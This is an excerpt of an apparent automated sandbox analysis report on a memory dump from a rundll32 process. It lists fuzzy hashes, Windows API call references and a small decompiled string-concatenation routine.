                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                          • String ID:
                                          • API String ID: 3767559652-0
                                          • Opcode ID: 49a342e8c2bb681233c224b899d7c19b67766c263644e7ee794cc3b9d1d50f0b
                                          • Instruction ID: f80087a6def261750c8c9f5c8a376487caf9a3a24e12036b0f3a477dc5e38cee
                                          • Opcode Fuzzy Hash: 49a342e8c2bb681233c224b899d7c19b67766c263644e7ee794cc3b9d1d50f0b
                                          • Instruction Fuzzy Hash: 8F21B472904259BFEB125FB5CD44AAF7FAADF06384B098064F904DB201E735EA02D7A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E04FD5FCB(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                          				void* _v8;
                                          				void* _t18;
                                          				int _t25;
                                          				int _t29;
                                          				int _t34;
                                          
                                          				_t29 = lstrlenW(_a4);
                                          				_t25 = lstrlenW(_a8);
                                          				_t18 = E04FD58BE(_t25 + _t29 + _t25 + _t29 + 2);
                                          				_v8 = _t18;
                                          				if(_t18 != 0) {
                                          					_t34 = _t29 + _t29;
                                          					memcpy(_t18, _a4, _t34);
                                          					_t10 = _t25 + 2; // 0x2
                                          					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                          				}
                                          				return _v8;
                                          			}









                                          APIs
                                          • lstrlenW.KERNEL32(004F0053,?,75145520,00000008,0752937C,?,04FD694E,004F0053,0752937C,?,?,?,?,?,?,04FD9C10), ref: 04FD5FDB
                                          • lstrlenW.KERNEL32(04FD694E,?,04FD694E,004F0053,0752937C,?,?,?,?,?,?,04FD9C10), ref: 04FD5FE2
                                            • Part of subcall function 04FD58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04FD1C51), ref: 04FD58CA
                                          • memcpy.NTDLL(00000000,004F0053,751469A0,?,?,04FD694E,004F0053,0752937C,?,?,?,?,?,?,04FD9C10), ref: 04FD6002
                                          • memcpy.NTDLL(751469A0,04FD694E,00000002,00000000,004F0053,751469A0,?,?,04FD694E,004F0053,0752937C), ref: 04FD6015
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlenmemcpy$AllocateHeap
                                          • String ID:
                                          • API String ID: 2411391700-0
                                          • Opcode ID: 56b9731860fca8eecb716d0486117ab516eb15dfb93b706682c20e07cb2308e1
                                          • Instruction ID: d6035b0b8e5af24a0117db70b918bb844f223a6a4149112827aa4fb4d4bb2ab2
                                          • Opcode Fuzzy Hash: 56b9731860fca8eecb716d0486117ab516eb15dfb93b706682c20e07cb2308e1
                                          • Instruction Fuzzy Hash: F6F04972900118BB9F11EFA9CC89C9F7BADEF082987094062EA04D7205E735EE15DBE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlen.KERNEL32(?,00000000,00000000,04FD5335,616D692F,00000000), ref: 04FD9DFB
                                          • lstrlen.KERNEL32(?), ref: 04FD9E03
                                            • Part of subcall function 04FD58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04FD1C51), ref: 04FD58CA
                                          • lstrcpy.KERNEL32(00000000,?), ref: 04FD9E1A
                                          • lstrcat.KERNEL32(00000000,?), ref: 04FD9E25
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                          • String ID:
                                          • API String ID: 74227042-0
                                          • Opcode ID: 1ca4b2dd7ba58cb89cfe25188dae90762bc0c4370cf6de842d33e9e069a8d022
                                          • Instruction ID: 47a8ffbdf276938e5711eaa1e403a6989419a4b6b3ea4d0f490126340ee88f7d
                                          • Opcode Fuzzy Hash: 1ca4b2dd7ba58cb89cfe25188dae90762bc0c4370cf6de842d33e9e069a8d022
                                          • Instruction Fuzzy Hash: 5BE01A33806665AB87226BB4AC0CC8FBBAAFF89260B094916F650D3114CB35D815CBE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%